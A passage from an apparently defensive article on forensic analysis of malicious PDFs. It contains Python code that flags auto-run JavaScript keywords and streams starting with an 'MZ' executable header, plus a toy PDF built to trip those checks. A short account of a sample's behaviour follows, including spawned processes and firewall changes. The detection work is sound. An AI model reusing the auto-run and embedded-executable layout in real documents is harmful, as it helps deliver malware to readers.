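    counts["obj"] = len(re.findall(rb"\b\d+\s+\d+\s+obj\b", pdf))
    counts["stream"] = len(re.findall(rb"\bstream\r?\n", pdf))
    for m in NAME_TOKEN.finditer(pdf):
        name = normalise_name(m.group(0)).decode("latin-1")
        if name in counts:
            counts[name] += 1
    return counts


def streams(pdf):
    """Yield (object number, decoded body) for each stream object. Only
    FlateDecode is handled; other filters are returned raw."""
    for m in STREAM_OBJ.finditer(pdf):
        num, dict_bytes, body = int(m.group(1)), m.group(2), m.group(3)
        if b"/FlateDecode" in normalise_name(dict_bytes):
            try:
                body = zlib.decompressobj().decompress(body)
            except zlib.error:
                pass  # keep the raw bytes; a broken filter is itself suspicious
        yield num, body


def embedded_executables(pdf):
    """Object numbers whose stream starts with MZ (hex 4d 5a), the DOS header."""
    return [num for num, body in streams(pdf) if body.startswith(b"MZ")]


def triage(pdf):
    """One-shot verdict combining auto-run script presence and MZ streams."""
    counts = keyword_counts(pdf)
    exes = embedded_executables(pdf)
    auto_script = (counts["/OpenAction"] + counts["/AA"] > 0
                   and counts["/JS"] + counts["/JavaScript"] > 0)
    return {"counts": counts, "mz_streams": exes,
            "suspicious": auto_script or bool(exes)}


def build_sample():
    """Constructed toy PDF: /OpenAction firing obfuscated JavaScript and a
    Flate-compressed /EmbeddedFile whose content starts with 'MZ'."""
    js = b"app.alert('constructed sample');"
    blob = zlib.compress(b"MZ\x90\x00" + b"\x00" * 60 +
                         b"This program cannot be run in DOS mode")
    return b"\n".join([
        b"%PDF-1.7",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R"
        b" /Names << /EmbeddedFiles 5 0 R >> >> endobj",
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj",
        b"3 0 obj << /S /Java#53cript /JS 4 0 R >> endobj",
        b"4 0 obj << /Length %d >>\nstream\n" % len(js) + js + b"\nendstream\nendobj",
        b"5 0 obj << /Names [(payload.exe) 6 0 R] >> endobj",
        b"6 0 obj << /Type /Filespec /F (payload.exe) /EF << /F 7 0 R >> >> endobj",
        b"7 0 obj << /Type /EmbeddedFile /Filter /FlateDecode /Length %d >>\nstream\n"
        % len(blob) + blob + b"\nendstream\nendobj",
        b"trailer << /Root 1 0 R >>",
        b"%%EOF",
    ])


if __name__ == "__main__":
    sample = build_sample()
    print(keyword_counts(sample))
    print(embedded_executables(sample))   # [7]
```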
As you can see from the Process Explorer window, virus.exe created two suspicious processes (zedeogm.exe, cmd.exe) that were interrupted after starting.
According to Process Monitor, the zedeogm.exe file was saved and appeared among the running processes. It then changed the rules set in Windows Firewall. The next step was to run the WinMail.exe file; after that, the program launched cmd.exe to run the tmpd849fc4d.bat file and stop the process.
The use of digital forensics techniques for the analysis of PDF documents can be essential to avoid interacting with malicious content. Together with other preventive measures, this practice can close one of the main vectors of threats today.
Other recommended measures to prevent this threat include:
As usual, we remind you that this material was prepared for informational purposes only and should not be taken as a call to action. IICS is not responsible for the misuse that may occur to the information contained herein.